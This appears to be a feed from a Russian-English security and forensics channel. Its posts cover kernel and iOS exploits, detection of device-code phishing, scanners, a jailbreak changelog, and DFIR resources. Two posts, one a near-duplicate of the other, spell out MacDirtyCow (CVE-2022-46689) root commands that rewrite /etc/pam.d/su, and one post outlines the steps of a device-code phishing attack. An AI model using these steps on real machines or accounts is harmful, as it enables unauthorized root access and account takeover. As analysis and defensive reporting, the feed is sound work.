🔥Так-с, вот и в дикой природе засветился сплойт, эксплуатирующий UAF багу(Ахтунг, CVSS 10 из 10) в сервере ksmbd(репозиторий, имплементация SMBv3 протокола в пространстве кернела для обмена файлами по сети, а в целом SMB/CIFS сервер, ранее: CIFSD) и можно выполнять код в контексте ядра в случае успешной эксплуатации.Для эксплуатации нам не понадобится добиваться LPE на машине жертвы, ведь не требуется аутентификация. По большому счету количество таргетов не большое в силу того, что ksmbd сервер появился лишь в версии кернела 5.15 и в целом процент SMB-серверов использующих имплементацию ksmbd по сравнению с Samba не велик .Баг был найден с помощью KASAN, в функции smb2_tree_disconnect(struct ksmbd_work *work) происходит освобождение структуры ksmbd_tree_connect, при этом остается висячий указатель, к которому можно получить опять доступ, воспользовавшись составным запросом. Для наглядности я сделал скрины(третий - с патчем безопасности) и выделил частично, далее...🛡Патч безопасности(коммит) тут
2022-12-22 20:56:04
📕Security of IoT Device: PerspectiveForensic/Anti-Forensic Issues on Invalid Area of NAND Flash Memory.#forensics #antiForensics #security #privacy #NAND #IoT
2022-12-22 20:55:51
#forensics #antiForensics #security #privacy #NAND #IoT
2022-12-22 17:52:27
|GiftStick|🕵️‍♂️Вжух и доказательства в кармане облаке! Сие чудо простой мысли было создано для сотрудников, желающих в один клик получить доказательства с устройства и отправить их в облако(не секьюрно, да и в целом - некорректно). Единственное что может понадобится сделать - выполнить предварительно немного телодвижений: выбрать собираемые артефакты и облачные учетные данные, которые будут использоваться.Конечно, момент с использованием dmidecode для получения системной информации - спорный, но плюсы с точки зрения производительности и безопасности могут перевесить недостатки. Но инструмент не очень пригоден для форензик-экспертизы, как минимум из-за отсутствия механизма блокировки записи и использования облачной платформы для отправки полученных данных.Вот что именно можно достать:💾Используя dmidecode, получаем системную информацию(дамп SMBIOS / содержимого таблицы DMI)💾Из каждого блочного устройства(по мнению автора: скорее всего внутренний диск) получаем следующие данные: ->все байты ->хэши ->используя udevadm, получаем информацию об устройстве💾Прошивка системы, сдампленная с помощью CHIPSEC💾Папка(к примеру - смонтированная файловая система.⚠️Если подвести итог по инструменту, то повторюсь в том, что инструмент из коробки не пригоден для форензик-специалиста, а если придерживаться концепции "в один клик", то уж тем более и от силы подойдет начинающим для пробы пера, да и факт отправки в облачное хранилище от Google на данный момент - такая себе перспектива.🕵️‍♂️Whoosh and the evidence is in the pocket cloud! This miracle of simple thought was created for employees who want to get evidence from the device in one click and send it to the cloud (it is not safe, and in general - incorrectly). The only thing that may need to be done is to perform a few body movements beforehand: select the artifacts to be collected and the cloud credentials to be used.Of course, the moment of using dmidecode to obtain system information is controversial, but the advantages in terms of performance and security may outweigh the disadvantages. But the tool is not very suitable for forensic examination, at least due to the lack of a record blocking mechanism and the use of a cloud platform to send the received data.Here's exactly what you can get:💾Using dmidecode, we get system information (SMBIOS dump / DMI table contents)💾From each block device (according to the author: most likely an internal disk) we get the following data: ->all bytes ->hashes ->using udevadm, we get information about the device💾System firmware, dumped using CHIPSEC💾Folder(for example, a mounted file system)⚠️If we summarize the tool, then I repeat that the tool out of the box is not suitable for a forensic specialist, and if you stick to the "one-click" concept, then it is even more suitable for beginners to try out a pen, and the fact of sending to the cloud storage from Google at the moment is such a perspective.#forensics #evidence #hardware #firmware #disk
2022-12-22 17:52:26
#forensics #evidence #hardware #firmware #disk
2022-12-22 13:26:52
|ForCons&Events2023|🕵️‍♂️2022 год уже подходит к концу, так что настало время посмотреть на конференции по форензике в 2023 году и начать планирование.Данный список с событиями в области форензики периодически обновляется.🕵️‍♂️The year 2022 is already coming to an end, so it's time to look at the 2023 forensics conferences and start planning.This list of events in the field of forensics is periodically updated.#forensics #NSA #Magnet #DFRWS #EuropeanPolice #InternationalPoliceExpo #SANS
2022-12-21 19:42:01
🔥The second version of Game Of Active directory is out!💥GOAD - part 1 - reconnaissance and scan💥GOAD - part 2 - find users💥GOAD - part 3 - enumeration with user💥GOAD - part 4 - poison and relay💥GOAD - part 5 - exploit with user💥GOAD - part 6 - ADCS💥GOAD - part 7 - MSSQL💥GOAD - part 8 - Privilege escalation💥GOAD - part 9 - Lateral move💥GOAD - part 10 - Delegations💥GOAD - part 11 - ACL💥GOAD - part 12 - Trusts
2022-12-20 13:42:34
🕵️‍♂️Поздравляю всех причастных с Днем работника органов безопасности Российской Федерации. Желаю сохранить здоровье во время службы и добиться успехов в оной.
2022-12-20 13:25:56
🕵️‍♂️У Кошки-федерала вышла статья про форензику и анти-форензику, подойдет для тех кто только-только вкатывается, без особой воды, тезисно и с ссылочками.🕵️‍♂️The Federal Cat has an article about forensics and anti-forensics, suitable for those who are just rolling in, without much water, thesis and with links.
2022-12-20 12:55:24
|FORCEDENTRY, ты тут?|🕵️‍♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: пост на канале, тут и тут.Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEПроблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах. 🔖Более подробно можно почитать в статье Мэтта.🕵️‍♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a post on the channel, here and here.Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEThe problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER). 🔖You can read more in Matt's article.#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-20 12:55:18
#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #secyrity #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-18 10:27:45
🤙Шизо на связи!💥Надеюсь, что вы не забыли про Dirty COW(PoCs). У Чжулвэйя вышел новый пост про получение рута в macOS 13.0.1 / 12.6.1 и ниже посредством эксплуатации CVE-2022-46689(запуск бинаря, перезапись и запуск по новой). По сути это эквивалентная Dirty COW вулне, только затрагивающая macOS(XNU), заместо линукс кернела, так что и репозиторий называется:"MacDirtyCowDemo", а саму уязвимость нашел Ян Бир(i41nbeer, "бывший" сотрудник GCHQ, предыдущая связанная вулна тут). В обновлении безопасности Apple(iOS 16.2 и iPadOS 16.2, iOS 15.7.2 и iPadOS 15.7.2, macOS 13.1, macOS 12.6.2, macOS 11.7.2, tvOS 16.2 и watchOS 9.2) говорится, что атакующий эксплуатируя эту вулну может исполнить произвольный код с привилегиями ядра и race condition предотвращается за счет новых проверок(как будет написано ниже - они косвенно влияют). Чжулвэй начал анализировать уязвимость, анализируя файл в Apple XNU(vm_unaligned_copy_switch_race.c) и добился race condition(один поток переключает память между readonly и writable, а второй - пытается писать данные), позволив ему в дальнейшем временно изменять файлы в томе /System(для сохранения изменений после ребута, нужно запускать на доступном для записи томе, все это из-за Sealed System Volume).У Чжулвэйя не удалось добиться выполнения произвольного кода с привилегиями ядра и получилось лишь влиять на юзерспейс процессы. Отключение проверки пароля удалось достичь за счет рекомендаций по проверке подлинности пользователя на основе политики, расположенной в /etc/pam.d(/etc/pam.d/login, pam_permit.so всегда разрешает доступ без аутентификации) и было представлено на Pwn2Own2020 и затронуто в докладе на Black Hat USA 2020 "Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities" и для удобства был добавлен параметр командной строки, принимающий в качестве аргумента то, что нужно перезаписать.Для получения рута нужно выполнить следующие команды по загрузки репозитория и перехода в директорию с ним:1️⃣clang -o switcharoo vm_unaligned_copy_switch_race.c2️⃣sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin3️⃣./switcharoo /etc/pam.d/su overwrite_file.bin4️⃣suИ после исполнения бинаря на этапе 3️⃣, должны получить следующий вывод:Testing for 10 seconds...RO mapping was modifiedА после выполнения команды su на этапе 4️⃣ будет получен доступ к рутованному шеллу:sh-3.2# Помимо всего прочего:💾В функции невыровненной записи(unaligned write) в XNU кернеле есть еще одна type confusion:mach_vm_write(mach_task_self(), printf, printf, 0x8001); Интерес представляет объединение vm_map_object:union vm_map_object {vm_object_t vmo_object; /* объект object */vm_map_t vmo_submap; /* принадлежит другой карте */} vm_map_object_t;Для vm адреса в sharedcache в роли первой записи будет вложенная карта(submap)Причем, VME_OBJECT как раз и вызывает type confusionТо есть shared cache mapping в памяти напрямую перезаписать не получится!💾За счет того, что submap не владеет VM_PROT_WRITE, патч приводит к досрочному возврату(либо следующий dst_object = VME_OBJECT(entry) приводит к панике), что как бы косвенно предотвращает type confusion, причем в vm_map_copy_overwrite_nested такое уже было в ярлыке по адресу:if (dst_end <= entry->vme_end) { goto start_overwrite; /*можно предотвратить проверки рарешений */}💾vm_map_copy_overwrite_unaligned не предполагает проверки на запись💾Вероятно, подписи кода(codesigning) и песочница помешает произвести перезапись. Так как весь процесс подыхает в случае подачи неверной сигнатуры и повторная проверка codesignature на странице довольно сильно мешает.⚠️Так что если ты подписчик пользуешься яблочной продукцией - обновляйся(уязвимость была запатчена в:iOS 16.2 и iPadOS 16.2, iOS 15.7.2 и iPadOS 15.7.2, macOS 13.1, macOS 12.6.2, macOS 11.7.2, tvOS 16.2 и watchOS 9.2)!#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-17 21:55:03
🤙Шизо на связи! 💥Надеюсь, что вы не забыли про Dirty COW(PoCs). У Чжулвэйя вышел новый пост про получение рута в macOS 13.0.1 / 12.6.1 и ниже посредством эксплуатации CVE-2022-46689. По сути это эквивалентная Dirty COW вулне, только затрагивающая macOS(XNU)…
2022-12-17 21:55:02
🤙Шизо на связи!💥Надеюсь, что вы не забыли про Dirty COW(PoCs). У Чжулвэйя вышел новый пост про получение рута в macOS 13.0.1 / 12.6.1 и ниже посредством эксплуатации CVE-2022-46689. По сути это эквивалентная Dirty COW вулне, только затрагивающая macOS(XNU), заместо линукс кернела, так что и репозиторий называется:"MacDirtyCowDemo", а саму уязвимость нашел Ян Бир(i41nbeer, "бывший" сотрудник GCHQ, предыдущая связанная вулна тут). В обновлении безопасности Apple говорится, что атакующий эксплуатируя эту вулну может исполнить произвольный код с привилегиями ядра и race condition предотвращается за счет новых проверок(как будет написано ниже - они косвенно влияют). Чжулвэй начал анализировать уязвимость, анализируя файл в Apple XNU(vm_unaligned_copy_switch_race.c) и добился race condition(один поток переключает память между readonly и writable, а второй - пытается писать данные), позволив ему в дальнейшем временно изменять файлы в томе /System(для сохранения изменений после ребута, нужно запускать на доступном для записи томе, все это из-за Sealed System Volume).У Чжулвэйя не удалось добиться выполнения произвольного кода с привилегиями ядра и получилось лишь влиять на юзерспейс процессы. Отключение проверки пароля удалось достичь за счет рекомендаций по проверке подлинности пользователя на основе политики, расположенной в /etc/pam.d(/etc/pam.d/login, pam_permit.so всегда разрешает доступ без аутентификации) и было представлено на Pwn2Own2020 и затронуто в докладе на Black Hat USA 2020 "Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities" и для удобства был добавлен параметр командной строки, принимающий в качестве аргумента то, что нужно перезаписать.Для получения рута нужно выполнить следующие команды по загрузки репозитория и перехода в директорию с ним:1️⃣clang -o switcharoo vm_unaligned_copy_switch_race.c2️⃣sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin3️⃣./switcharoo /etc/pam.d/su overwrite_file.bin4️⃣suИ после исполнения бинаря на этапе 3️⃣, должны получить следующий вывод:Testing for 10 seconds...RO mapping was modifiedА после выполнения команды su на этапе 4️⃣ будет получен доступ к рутованному шеллу:sh-3.2# Помимо всего прочего:💾В функции невыровненной записи(unaligned write) в XNU кернеле есть еще одна type confusion:mach_vm_write(mach_task_self(), printf, printf, 0x8001); Интерес представляет объединение vm_map_object:union vm_map_object {vm_object_t vmo_object; /* объект object */vm_map_t vmo_submap; /* принадлежит другой карте */} vm_map_object_t;Для vm адреса в sharedcache в роли первой записи будет вложенная карта(submap)Причем, VME_OBJECT как раз и вызывает type confusion💾За счет того, что submap не владеет VM_PROT_WRITE, патч приводит к досрочному возврату(либо следующий dst_object = VME_OBJECT(entry) приводит к панике), что как бы косвенно предотвращает type confusion, причем в vm_map_copy_overwrite_nested такое уже было в ярлыке по адресу:if (dst_end <= entry->vme_end) { goto start_overwrite; /*можно предотвратить проверки рарешений */}💾vm_map_copy_overwrite_unaligned не предполагает проверки на запись💾Вероятно, подписи кода(codesigning) и песочница помешает произвести перезапись.⚠️Так что если ты подписчик пользуешься яблочной продукцией - обновляйся(уязвимость была запатчена в:iOS 16.2 и iPadOS 16.2, iOS 15.7.2 и iPadOS 15.7.2, macOS 13.1, macOS 12.6.2, macOS 11.7.2, tvOS 16.2, watchOS 9.2)!#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-16 23:00:44
💥1day link Private Shizo(fully free)
2022-12-16 20:37:34
😉Отличных тебе выходных, пусть они пройдут отлично, подарят хорошие воспоминания и надеюсь что у тебя все наладится.😉Have a great weekend, let them go great, give you good memories and hope that everything will get better for you.
2022-12-16 19:36:36
├BTC-ETH-XRP-BCH-LTC-XLM-DASH-ZEC-XMR-TON (Blockchain)├Google Dorks (Change Wallet)├blockchair (Explorer) + Chrome├breadcrumbs (Visualization) + Chrome├shard (Visualization)├blockpath (Visualization)├oxt (Visualization)├graphsense (Visualization)├ethtective (Visualization ETH)├walletexplorer (Grouping)├bitinfocharts (Grouping)├bitcoinabuse (Abuse)├bitcoinwhoswho (Abuse)├checkbitcoinaddress (Abuse)├scamalert (Abuse)├cryptscam (Abuse)├ransomwhe (Abuse)├badbitcoin (Abuse)├bitcoinais (Abuse)├cryptoblacklist (Abuse)├bitrankverified (Scoring)├vivigle (Scoring)├antinalysis (Scoring TOR)├cryptocurrencyalerting (Monitoring)├cryptotxalert (Monitoring)├kycp (Block Analysis)├blockstream (Block Analysis)├fragment (TON market)└btcrecover (Wallet Brute)
2022-12-16 17:52:20
|In pursuit of phishing with device code authentication|🕵️InverseCos has published an interesting article about detecting the phishing code of a malicious device in MS office 365. It is better to read about the phishing technique itself in the original post from Nestori, and in short, the attack consists of the following steps:1️⃣The attacker connects to the /devicecode endpoint and sends client_id and resource2️⃣After receiving verification_uri and user_code, the attacker creates an email that contains a link to verification_uri and user_code, after which the attacker sends it to the victim3️⃣Of course, the victim clicks on the link and gives the code into the hands of the attacker, filling in the input field with the code, thereby completing the login4️⃣Profit! The attacker has access_token and refresh_token of the victim on his hands, getting the opportunity to imitate it.Of greater interest is still the methodology for detecting from InverseCos for the reason that there is not so much information, and the process itself is far from the simplest. The methodology itself implies two methods (log sources): 1️⃣Azure login logs, which will allow us to obtain the following data that can be used as evidence in the future (Nestori mentioned that when entries are created in the login logs, they can be associated with an IP address and geolocation):💾Was device code authentication used (device code authentication)💾Is one-factor login to the system based on the fact of using tokens to log in to it💾Was it used to gain access to the resource being used (for example: Graph API)💾Is the IP address malicious?It is not a little important during the forensic analysis (examination) to closely study the interactive sign-ins section, focusing on the following things (advice from InverseCos: pay due attention to the section "Authentication Protocol"):💥Which application platform is used (Client App, that is, mobile appears or a desktop application)🔥Authentication Protocol (device code)💥Application (in our case - Microsoft Office)💥IP address (if there is a difference from the IP addresses used by the user, then another clue leading to a comparison with the attacker)💥Resource ID (a string that helps to accurately identify the manipulations of the attacker - the requested resource, in a situation with this phishing technique - using Graph:"00000003-0000-0000-c000-000000000000" 💥Authentication Requirement, due to the use of a token - one-factor authentication💥Additional information (Additional Details, the MFA requirement is satisfied with the application in the token)2️⃣Unified Audit Logs(UAL)Using this method does not give a high accuracy of detecting an attack due to the fact that the "login event" that occurs every time a request is sent to Graph via an access token does not give much useful information about the likelihood of suspicious activity.The method itself allows you to get the following attributes when an attacker gains access to an account:🔬Activity(user logins)🔬ExtendedProperties.RequestType: Cmsi:Cmsi 🔬Item( a string for the resource requested by the attacker. In our case for Microsoft graph)🔬Application ID ( client ID that the attacker wants to appear to, in the case of this phishing technique: "Microsoft Office id")🔬IP address (as in the first method, we need to set the malicious IP address of the attacker)⚠️Important! To get a more relevant and accurate result, it is better to combine both methods, as well as generally use methods/methods/tools for browser and email forensics at the same time.⚙️A simple example implemented on KQL (used in: Azure Monitor, Azure Data Explorer and Azure Log Analytics) for Sentinel can be found here.#DFIR #forensics #browserForensics #emailForensics #Azure #UAL #log #phishing #OAuth #bypassMFA
2022-12-16 17:52:10
|В погоне за фишингом с device code аутентификацией|🕵️‍♂️У InverseCos вышла интересная статья про детектирование фишингового кода вредоносного устройства в MS office 365. Про саму технику фишинга лучше почитать в оригинальном посте от Нестори и если вкратце то атака состоит из следующих шагов:1️⃣Злоумышленник подключается к /devicecode эндпоинту и отправляет client_id и resource2️⃣После получения verification_uri и user_code, злоумышленник создает электронное письмо, которое содержит ссылку на verification_uri и user_code, после чего злоумышленник отправляет его жертве3️⃣Жертва конечно же нажимает на ссылку и считай отдает в руки злоумышленника код, заполняя поле ввода кодом, тем самым завершает вход в систему4️⃣Профит! У злоумышленника на руках появляется access_token и refresh_token жертвы, получая возможность имитировать её.Больший интерес все-таки представляет методология по детектированию от InverseCos по той причине, что информации не так уж то и много, да и сам процесс далеко не из самых простых. Сама методика подразумевает два метода(источники логов): 1️⃣Журналы входа в Azure, которые позволят нам получить следующие данные, которые можно использовать в дальнейшем как доказательства(Нестори упомянул, что когда создаются записи в логах входа, то их можно связать с IP-адресом и геолокацией):💾Использовалась ли аутентификация по коду устройства(device code authentication)💾Является ли вход в систему однофакторным на основе факта использования токенов для входа в оную💾Был ли он использован для получения доступа к используемому ресурсу( для примера: Graph API)💾Является ли IP-адрес вредоносным?Не мало важно в ходе форензик-анализа(экспертизы) пристально изучить раздел интерактивных входов(interactive sign-ins), акцентируя внимания на следующих вещах(совет от InverseCos: уделить должное внимание разделу "протокол аутентификации(Authentication Protocol)"):💥Какая платформа приложения используется(Client App, то бишь фигурирует мобильное или десктопное приложение)🔥Протокол аутентификации(Authentication Protocol, код устройства)💥Приложение(Application, в нашем случае - Microsoft Office)💥IP-адрес(если есть отличие от IP-адресов, используемых пользователем, то еще одна зацепка, ведущая к сопоставлению с злоумышленником)💥Идентификатор ресурса(Resource ID, строка помогающая точно установить манипуляции злоумышленника - запрошенный ресурс, в ситуации с этой техникой фишинга - использование Graph: "00000003-0000-0000-c000-000000000000" 💥Требование к аутентификации(Authentication Requirement, из-за использование токена - однофакторная аутентификация)💥Дополнительные сведения(Additional Details, требование MFA удовлетворено заявкой в токене)2️⃣Унифицированные журналы аудита(Unified Audit Logs, UAL)Использование данного метода дает не высокую точность обнаружения атаки по причине того, что "событие входа в систему", происходящее при каждом отправлении запроса в Graph посредством токена доступа дает не много полезной информации об вероятности подозрительной активности.Сам метод позволяет получить следующие атрибуты при получении доступа к учетной записи злоумышленником:🔬Активность(Activity, входы пользователя в систему)🔬ExtendedProperties.RequestType: Cmsi:Cmsi 🔬Элемент(Item, строка для ресурса, запрашиваемого злоумышленником. В нашем случае для Microsoft graph)🔬Идентификатор приложения(App ID, id клиента, которым хочет показаться злоумышленник, в случае с этой техникой фишинга: "Microsoft Office id")🔬IP-адрес(как и в первом методе, нам необходимо установить вредоносный IP-адрес злоумышленника)⚠️Важно! Для получения более релевантного и точного результата, лучше совмещать оба метода, а также в целом использовать одновременно методы/способы/инструменты для форензик-эскпертизы браузеров и электронной почты.⚙️С простым примером, реализованным на KQL(используется в: Azure Monitor, Azure Data Explorer и Azure Log Analytics) для Sentinel, можно ознакомиться тут.#DFIR #forensics #browserForensics #emailForensics #Azure #UAL #log #phishing #OAuth #bypassMFA
2022-12-16 17:52:03
🕵️‍♂️В погоне за фишингом с device code аутентификацией🕵️‍♂️In pursuit of phishing with device code authentication#DFIR #forensics #browserForensics #emailForensics #Azure #UAL #log #phishing #OAuth #bypassMFA
2022-12-16 12:31:10
|AppSec Ezine|📰461rd EditionRelease Date: 16/12/2022pathonprojectgithub#ezine #appsec #infosec
2022-12-13 02:44:37
|MI-X - Am I sure the CIA won't hack me?|🛡It is not uncommon for a user concerned about the security of the system and the software installed in it to ask the question: "is the configured environment (is a specific software package/component exploitable) vulnerable to a certain vulnerability at the moment with (not) installed security features?" It is not uncommon for this to happen: I will assemble software (in a broad sense) from sources or download it assembled from resource X (bypassing direct interaction with the package manager installed in the system), then I will launch a vulnerability scanner and check the system whether it is vulnerable at the moment? It would seem that the task is not that difficult, but after the scanners work, we see: "Everything is fine, you will not be hacked - 1000%" and you think that everything is fine (of course, some will doubt the result and this is correct) I will not be hacked or the attacker will need to use 0-day exploits or in the case of without a blind doubt, you will think that security recommendations regarding a particular vulnerability have not yet appeared, or the scanner developer(s) have not yet added code that checks for the presence of this vulnerability in the package and exploitability, respectively.However, the truth is that "most super-duper" scanners are based on interaction with the metadata of the package manager (obtaining data about installed packages, then they are compared with recommendations for a specific vulnerability). What does this mean? For example, we have compiled program X from the source code and placed it far away from "/bin" or "/sbin", run the scanner and get a negative result: "Your fortress is protected, nothing is detected, all components are not exploitable!". Well, everything can be exhaled, did you think?As if not so! You were naturally fooled by the scanner. Although he did not have the opportunity to tell the truth, because he had the data on his hands, obtained only from the package manager installed in you.💥MI-X comes to the rescue. No, if you turn out to be a rather desirable target, then this will not help, but it will complicate the task if you take measures based on the received result of MI-X.What is its difference from most scanners? With its help, we can check on the basis of many parameters/factors that actually affect whether it is possible to exploit a certain package in reality (not just compared the name, version of the package and compared it with the previously described recommendations for a specific vulnerability) and run, for example, a scan of all running containers (flag: -c --container) or a specific container (flag which container to scan: -n --container_name), specifying the vulnerabilities that we want to check (we can specify a specific one by cve id or by name, or all available in the scanner's arsenal at once).Next, we can present the vulnerability check flow (the logic of the check flow) as a human-readable graph (flag: -g --graph , False by default) and export it to one of the following formats:json, csv and text (flag: -f --format'), having received recommendations for correction and mitigating measures or get a description of the vulnerability (flag: --description, True by default)Example of a command to check the operability of Dirty Pipe(CVE-2022-0847, exploit) in our system (I scan all containers), getting the logic of the verification flow in the form of a graph to export the result to csv:python3 am_i_exploitable.py -v CVE-2022-0847 -c True -g True -f csv⚠️If the hands grow from the right place (I definitely don't), then you can add the necessary checks yourself. And don't forget: there are no "elusive Joes"!📺Previously, before checking on your machine, you can see the demo: how it works.#security #vulnScan #expoitation
2022-12-13 02:44:12
|MI-X - меня точно ЦРУ не взломает?|🛡Не редко пользователь, озабоченный безопасностью системы и программного обеспечения, установленного в оной задается вопрос: "подвержена ли сконфигурированная среда(является конкретный программный пакет/компонент эксплуатабельным) определенной уязвимости в данный момент с (не)установленными средствами обеспечения защиты?" Не редко происходит так: соберу софтину(в широком смысле) из исходников или загружу её собранную с ресурса X(миную прямое взаимодействие с пакетным менеджером, установленным в системе), затем запущу сканер уязвимостей и проверю систему, уязвима ли она в данный момент? Казалось бы задача не сказать не то чтобы сложная, однако после работы сканеры мы видим: "Все хорошо, тебя не взломают - 1000%" и ты думаешь, что все хорошо(конечно, некоторые усомнятся в результате и это правильно) меня не взломают или атакующему потребуется задействовать 0-day сплойты или в случае слепого сомнения ты подумаешь, что просто пока не появились рекомендации безопасности относительно той или иной уязвимости или разработчик(и) сканера еще не добавил код, проверяющий на наличие этой уязвимости в пакете и эксплуатабельность соответственно.Однако правда такова, что "большинство супер-пупер" сканеров основывается на взаимодействии с метаданными пакетного менеджера(получение данных о установленных пакетах, далее они сравниваются с рекомендациями для конкретной уязвимости). Что же это означает? Вот собрали мы к примеру программу X из исходников и поместили её далеко-далеко от "/bin или "/sbin", запускаем сканер и получаем отрицательный результат: "Ваша крепость защищена, ничего не обнаружено, все компоненты не эксплуатабельны!". Ну все можно выдохнуть, подумал ты?Как бы не так! Тебя натурально облапошил сканер. Хотя у него и не было возможности сказать правду, ведь у него были на руках данные, полученные лишь из установленного у тебя пакетного менеджера.💥На помощь приходит MI-X. Нет, если ты окажешься довольно желанным таргетом, то и это не поможет, но усложнит задачу если ты примешь меры на основе полученного результата работы MI-X.В чем же его отличие от большинства сканеров? С его помощью мы можем проверить основе множества параметров/факторов, которые собственно влияют можно ли проэксплуатировать определенный пакет в действительности(не просто сравнил название, версию пакета и сравнил с ранее описанными рекомендациями по конкретной уязвимости) и запустить к примеру сканирование всех запущенных контейнеров( флаг -c --container) или конкретного контейнера(флаг, какой контейнер нужно сканировать: -n --container_name) на хосте, указав уязвимости, которые мы хотим проверить(можем указать конкретную по cve id или по имени, или сразу все, имеющиеся в арсенале сканера).Далее мы можем поток проверки уязвимостей(логика потока проверки) представить в виде удобочитаемого графа(флаг -g --graph, по умолчанию False) и экспортировать в один из следующих форматов:json, csv и text(флаг -f --format') , получив рекомендации по исправлению и смягчающие меры или получить описание уязвимости ( флаг --description, по умолчанию True).Пример команды для проверки эксплуатабельности Dirty Pipe(CVE-2022-0847, сплойт) в нашей системе(сканирую все контейнеры), получая логику потока проверки в виде графика экспортировать результат в csv:python3 am_i_exploitable.py -v CVE-2022-0847 -c True -g True -f csv⚠️Если руки растут из правильного места(у меня так точно - нет), то можно самостоятельно добавить необходимые проверки. И не забывай: нет "неуловимых Джо"!📺Предварительно перед тем, как проверить на своей машине, можно посмотреть демо-видео работы инструмента.#security #vulnScan #expoitation
2022-12-13 02:44:04
🛡MI-X - меня точно ЦРУ не взломает?🛡MI-X - Am I sure the CIA won't hack me?#security #vulnScan #expoitation
2022-12-12 22:25:00
🔥🔥🔥palera1n has been updated with iOS 16 support for A11 devices and lower! Changelog:💾Does not mount user data partition for iPhone X compatibility, isn't even really needed anymore💾Deploys files to the rootfs (fakefs if needed)💾Fix deviceid finding💾Use apticket.der because dumping rdisk seems to freeze💾Add /.installed_palera1n with info💾uicache loader app on boot (no more Tips app hijacking)💾Fix rootless💾Webkit fix on 16💾Switch to local boot💾Fix home button on iPhone 7(+) and 8(+)💾Increase stability💾Supports 15.0-16.2 on all checkm8 devices⚠️If you enabled a passcode, you must erase the device (with iTunes or in the settings app). You may restore a backup.⚠️On iOS 16, the device must have never had a passcode set since restoring (only on A10+, A9 is not affected), and dev mode must be enabled.
2022-12-11 00:39:30
|AppSec Ezine|📰460rd EditionRelease Date: 09/12/2022pathonprojectgithub#ezine #appsec #infosec
2022-12-10 21:02:50
🕵️‍♂️DFIR Cheat Sheet 📑The Ultimate List of SANS Cheat Sheets📑DFIR Cheat Sheet(commands, tools, & common items)🔖DFIR Cheat Sheet(tools, tips, and resources)🔖volatility Command Reference🔖The Forensic-Cheat-Sheet forLinux and TSK📑iOS Forensic Toolkit 8 Extraction Agent Cheat Sheet(ElcomSoft)📑mac_apt Sample Usage📑Linux Compromise Assessment Command Cheat Sheet🔖Command Line CompromiseDetection for Linux#DFIR #iOS #Android #Windows #Linux #macOS #cheatSheet #SANS #Elcomsoft #volatility #iOSforensicToolkit
2022-12-09 16:57:01
😉Это что, уже пятница? Надеюсь ты отлично отдохнешь и получишь незабываемые воспоминания, а может просто наберешься сил на природе или в любом другом месте силы, а если вдруг что-то произошло плохое - не унывай, превозмогая все и прикладывая усилия у тебя получится.😉Is it Friday already? I hope you will have a great rest and get unforgettable memories, or maybe you will just gain strength in nature or in any other place of strength, and if suddenly something bad happened - not discouraged, overcoming everything and making efforts you will succeed.
2022-12-09 13:42:56
|It's raw and crumpled, but we'll extract|🕵️‍♂️This short post is dedicated to open source tools that are used to bitwise copy data from a disk or volume that is stored in one or more files using various low-level methods (RawCopy in the common people). ⚙️RawCopy is a popular tool for copying files from NTFS volumes (reading is carried out thanks to the low-level method), I advise you to use it carefully, since problems in the logic of extracting data from the media have been identified for a long time.⚙️RawDiskCopier - a tool for copying data from one hard drive to another(as originally planned, solid-state drives are also possible if desired), sometimes it does not work badly with faulty hard drives (damaged sectors, respectively, the time spent on copying data depends on the number of such sectors due to re-reading sector by sector and error handling logic provided for when designing the hard drive)⚙️ntfsDump - copying files from a volume from an NTFS partition occurs by reading a raw volume (a descriptor opens to read the volume completely) and parsing/analyzing NTFS structures. It is clear that in order to work correctly, you need to run from under the admin (for bypass: DACL, blocking read descriptors, SACL, etc.).⚙️rawccopy is essentially a C-ported version of RawCopy, only covering some bugs. But after reading it, I realized that the difference is big and the extraction logic itself has been redesigned 